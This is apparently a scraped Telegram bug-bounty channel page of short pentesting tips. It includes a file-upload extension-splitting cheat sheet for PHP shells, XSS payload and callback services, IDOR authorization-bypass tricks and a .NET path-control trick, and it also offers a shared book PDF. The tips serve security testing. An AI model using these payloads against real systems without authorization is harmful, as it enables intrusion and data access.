uz
Feedback
Bug Bounty - GitBook

Bug Bounty - GitBook

Kanalga Telegram’da o‘tish
7 428
Obunachilar
+324 soatlar
+37 kunlar
+16730 kunlar
Postlar arxiv
Web_Application_Security_Exploitation_and_Countermeasures_for_Modern.pdf14.16 MB

photo content

Andrew Ho€man Web Application Security Exploitation and Countermeasures for Modern Web Applications SECOND EDITION 2024

photo content

37 books

photo content

Guys do you want this books?
+1
Guys do you want this books?

Guys do you want this books?

File Upload Extension Splitting Cheat Sheet 🔸 qwe.php%00.png 🔸 qwe.php%0A.png 🔸 qwe.php\n.png 🔸 qwe.php\u000a.png 🔸 qwe.php\u560a.png 🔸 qwe.php%E5%98%8A.png 🔸 qwe.php;.png 🔸 qwe.php%3B.png 🔸 qwe.php\u003b.png 🔸 qwe.php\u563b.png 🔸 qwe.php%E5%98%BB.png #Shell @GitBook_s

xsshunter.com You can use alternative 🔗 http://xss.report #XSS @GitBook_s
xsshunter.com You can use alternative 🔗 http://xss.report #XSS @GitBook_s

#BugBounty @GitBook_s
#BugBounty @GitBook_s

photo content

APIs expose the underlying implementation of the app. Pentesters should leverage this fact to better understand users, roles, resources & correlations between them and find cool vulnerabilities & exploits. Always be curious about the API responses. #api @GitBook_s

Pentest for .NET apps? Found a param containing file path/name? Developers sometimes use "Path.Combine(path_1,path_2)" to create full path. Path.Combine has weird behavior: if param#2 is absolute path, then param#1 is ignored. Leverage it to control the path #api @GitBook_s

BE Servers no longer responsible for protecting against XSS. APIs don't return HTML, but JSON instead. If API returns XSS payload? - E.g: {"name":"In<script>alert(21)</script>on} That's fine! The protection always needs to be on the client side #api @GitBook_s

Looking for BOLA (IDOR) in APIs? got 401/403 errors? AuthZ bypass tricks: Wrap ID with an array {“id”:111} --> {“id”:[111]} JSON wrap {“id”:111} --> {“id”:{“id”:111}} Send ID twice URL?id=<LEGIT>&id=<VICTIM> Send wildcard {"user_id":"*"} In some cases, the AuthZ mechanism expects a plain string (an ID in this case), and if it receives a JSON instead it won't perform the AuthZ checks. Then, when the input goes to the data fetching component, it might be okay with a JSON instead of string(e.g: it flattens the JSON) #api @GitBook_s

Found an "export to PDF" feature? There's a good chance the developers use an external library to convert HTML --> PDF behind the scenes. Try to inject HTML elements and cause "Export Injection". Learn more about Export Injection: https://medium.com/@inonst/export-injection-2eebc4f17117 #api @GitBook_s